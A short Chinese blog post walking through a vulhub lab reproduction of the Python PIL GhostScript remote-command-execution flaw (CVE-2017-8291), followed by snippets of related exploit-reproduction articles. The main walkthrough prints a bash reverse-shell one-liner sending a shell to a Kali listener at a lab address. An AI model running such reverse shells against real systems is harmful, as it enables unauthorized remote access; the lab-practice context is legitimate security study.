PIL-CVE-2017-8291

最新推荐文章于 2025-05-20 22:03:40 发布
最新推荐文章于 2025-05-20 22:03:40 发布
阅读量1.2k 收藏 1
点赞数 2
分类专栏: vulhub 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_48703517/article/details/124613618
版权
本文详细介绍了如何在Docker容器内部执行命令,通过上传并执行poc.png来反弹shell到192.168.71.131的8888端口。同时,Kali系统成功建立了监听,展示了渗透测试中的典型操作流程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开靶场

192.168.71.141:8000打开

 

讲poc.png上传

以 docker exec –it 7dd /bin/bash

进入容器在tmp下找到poc.png

反弹shell

bash –c  “bash –i >& /dev/tcp/192.168.71.131/8888 0>&1”

Kali启动监听

成功

Python PIL 远程命令执行漏洞(GhostButt CVE-2017-8291
qq_54713392的博客
05-14 1200
Python PIL 远程命令执行漏洞(GhostButt CVE-2017-8291 ) 漏洞原理:Python中处理图片的模块PILPillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞 攻击机:window 10 192.168.32.1 靶机:ubantu 16.04 192.168.32.142 (1)在ubantu中开启docker环境CVE-2017-8291 执行命令:docker-compose up
vulhub漏洞复现55_python
weixin_44193247的博客
02-11 838
vulhub漏洞复现练习篇
Python PIL远程命令执行漏洞复现(CVE-2017-8291 CVE-2017-8291)
didiplus
08-03 3093
漏洞原理 Python中处理图片的模块PILPillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞。 漏洞详情 漏洞简述 PIL内部根据图片头(Magic Bytes)判断图片类型,如果发现是一个eps文件(头为%!PS),则分发给PIL/EpsImagePlugin.py处理。 在这个模块中,PIL调用了系统的gs命令,也就是GhostScript来处理图片文件: command = ["gs",
Python-PIL-远程命令执行(GhostButt-)(CVE-2017-8291
bqnagus
10-02 905
Python-PIL-远程命令执行(GhostButt-)(CVE-2017-8291
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1134
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 复现过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
入侵防御漏洞复现(四)
szdx1043的博客
01-22 1197
ISC BIND是美国Internet Systems Consortium(ISC)公司所维护的一套实现了DNS协议的开源软件。ISC BIND 9.9.7-P1及之前版本和9.10.2-P2及之前版本的named中存在安全漏洞。远程攻击者可借助TKEY查询利用该漏洞造成拒绝服务(REQUIRE断言失败和守护进程退出)。
漏洞复现笔记(CVE-2018-19475)
weixin_72760965的博客
06-14 375
GhostScript 被许多图片处理库所使用,如 lmageMagick、 Pthon PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。8月21号,Tavis 0rmandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞。其次给shell文件执行权限。最后执行反弹shell命令。首先生成shell文件。查看容器是否生成文件。
利用Vulnhub复现漏洞 - GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116)
JiangBuLiu的博客
07-08 1937
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC上传POC文件检测是否成功 Vulnhub官方复现教程 https://vulhub.org/#/environments/ghostscript/CVE-2019-6116/ 漏洞原理 GhostScript 被许多图片处理库所使用,如 ImageMagi...
利用Vulnhub复现漏洞 - GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
JiangBuLiu的博客
07-08 2108
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC上传POC Vulnhub官方复现教程 https://vulhub.org/#/environments/ghostscript/CVE-2018-16509/ 漏洞原理 GhostScript 被许多图片处理库所使用,如 ImageMagick、Pyt...
Python PIL远程命令执行漏洞(GhostButt)
qq_41048303的博客
12-21 1237
1.原理 Python中处理图片的模块PIL(Pillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞。PIL内部根据图片头来判断图片类型,如果发现是一个eps文件,则分发给PIL/EpsImagePlugin.py处理。如果操作系统上安装了GhostScript就会因为它的一个沙盒绕过漏洞,导致任意命令执行。 2.漏洞环境 docker-compose up -d 运行后,访问http://192.168.184.130
CVE-2017-12149漏洞复现
2301_80115097的博客
10-31 847
中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等。其他漏洞编号利用方式类似,直接放入到工具当中进行检测,存在就存在,可直接执行命令或其上传,注入等操作。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
APT组织Lazarus近期攻击变化阐述
blackorbird的博客
07-08 670
Lazarus是来自朝鲜的APT组织,该组织长期对韩国、美国进行渗透攻击,此外还对全球的金融机构进行攻击,堪称全球金融机构的最大威胁。下面为近半年该组织的一些最新动态以及...
Vsftpd后门
qq_54713392的博客
05-09 751
Vsftpd后门 打开msf,使用search查找vsftpd模块,使用use调用该模块 连接metasploitable的ip地址,使用set rhost IP地址 使用run执行,生成shell
Linux rpmsg源码分析
小伟的博客
05-18 687
RPMsg是利用通道进行数据通信,先用 /dev/rpmsg_ctrl0 设备通过ioctrl生成端点,然后使用生成的端点进行通讯名称服务,VIRTIO_RPMSG_F_NS 宏,不开启就不使用名称服务,使用就需要m核心先发送信息才可以注册设备m核心LinuxRPMsg内核驱动框架涉及到RPMsg框架、virtio框架、remoteproc子系统和mailbox子系统mailbox,驱动开发者可自我注册client生成设备提供APP层直接进行核间通信分析物理层,创建virtio dev。
Linux笔记】——Linux线程封装
GGDxianv的博客
05-17 1196
本文介绍了在Linux环境下基于pthread库的线程封装类,旨在简化多线程编程的复杂性。该封装类提供了线程的创建、启动、终止、分离和回收等功能。核心功能包括通过Start()方法创建并启动线程,Stop()方法终止线程,Detach()方法将线程设置为分离状态,以及Join()方法回收线程资源。封装类通过静态成员函数routine和this指针的巧妙结合,解决了线程函数与类成员函数的兼容性问题。源码展示了线程类的实现细节,包括线程ID、状态标志、线程名称和回调函数的封装。该封装类为多线程编程提供了简洁高效
[Linux]系统调用read函数
myloveasuka的博客
05-17 1201
read 函数是 Linux 中常用的系统调用之一,用于从文件或设备读取数据。其基本形式为 ssize_t read(int fd, void *buf, size_t count),其中 fd 是文件描述符,buf 是用户提供的缓冲区,count 是要读取的字节数。
ubuntu下实时检测机械硬盘和固态硬盘温度
前行居士
05-20 80
本文介绍了如何在Linux系统中使用smartmontools工具监控硬盘温度。首先,通过sudo apt update和sudo apt install smartmontools命令安装工具。接着,使用sudo smartctl -a /dev/sda查看硬盘详细信息,包括温度。虽然smartctl无法实时显示温度,但可以通过watch命令定期查看,如watch -n 10 "sudo smartctl -a /dev/sda | grep Temperature_Celsius",
Linux】初见,基础指令(续)
最新发布
记录学习与成长
05-20 535
本文介绍了Linux系统中的多个常用指令及其功能。cat指令用于打印文件内容,支持行号编号和空行压缩;more和less指令用于分页显示文件内容,less功能更强大,支持搜索和行号显示;head和tail指令分别显示文件头部和尾部内容,支持指定行数;date指令用于显示和格式化时间,支持时间戳转换;cal指令查看日历;find指令用于查找文件;whereis指令查找命令位置;alias指令为命令取别名;grep指令在文件中搜索字符串;zip和unzip指令用于压缩和解压文件;rzsz指令用于Linux与Wi
Linux(2)——shell原理及Linux中的权限
2301_80065652的博客
05-18 630
该提示是说你没有被超级用户(root)添加到信用列表(sudoers)当中,所以该条指令的权限得不到提升(你可以想想嘛,怎么可能让一个普通用户随意更改另一个普通用户的密码),只有当你被超级用户添加到信任列表后,你才拥有提升当前指令权限的能力。但实际上你会发现,你所创建出来的文件和目录的权限值往往不是我们所翻译出来的值,原因就是创建文件和目录的时候还要受到umask的影响,假设默认权限是mask,则实际创建出来的文件权限是:mask&(~umask)(2)将核心处理的结果返回给给用户。
python ghostscript
08-29
Python中的GhostScript是一种用于处理PDF文件的工具。在Python的图像处理模块PILPillow)中,调用了GhostScript,但由于GhostButt漏洞(CVE-2017-8291),存在远程命令执行漏洞。您可以使用python3-ghostscript==0.5.0这个Python包来安装GhostScript工具包,并将PDF文件转化为图片格式。 另外,在一些开发和测试的项目中,有时也会使用PyQt5和HTML来实现页面窗体和页面内容,通过PyQt5中自带的WebEngineView实现python和html之间的数据交互。对于电子标签的打印,也可以使用PyQt中的QtextDocument来实现。在实现pdf文档的静默打印方面,可能会遇到一些困难,因为一些常见的调用打印接口的代码会打开pdf文档后再进行打印。但在某些任务中,静默打印是必需的,因此可能需要花费一些时间来制作pdf并实现静默打印。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Python PIL 远程命令执行漏洞(GhostButt )](https://blog.youkuaiyun.com/EC_Carrot/article/details/118973388)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [Ghostscript for windows](https://download.youkuaiyun.com/download/weixin_41935140/10708338)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [python打印电子标签--ghostscript 和reportlab实现](https://blog.youkuaiyun.com/wolf1132/article/details/84651214)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值